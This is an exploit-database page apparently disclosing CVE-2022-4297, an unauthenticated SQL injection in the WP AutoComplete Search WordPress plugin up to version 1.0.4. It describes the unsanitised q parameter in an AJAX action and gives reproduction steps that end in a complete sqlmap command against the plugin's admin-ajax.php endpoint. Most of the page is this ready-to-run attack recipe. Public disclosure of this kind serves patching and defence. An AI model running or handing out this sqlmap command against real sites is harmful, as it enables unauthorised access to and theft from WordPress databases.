WordPress WP AutoComplete Search 1.0.4 SQL Injection

2023.07.05
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi # Date: 30/06/2023 # Exploit Author: Matin nouriyan (matitanium) # Version: <= 1.0.4 # CVE: CVE-2022-4297 Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/ # Tested on: Kali linux --------------------------------------- The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users, leading to an unauthenticated SQL injection -------------------------------------- How to Reproduce this Vulnerability: 1. Install WP AutoComplete <= 1.0.4 2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests 3. Find requests belong to WP AutoComplete like step 5 4. Start sqlmap and exploit 5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top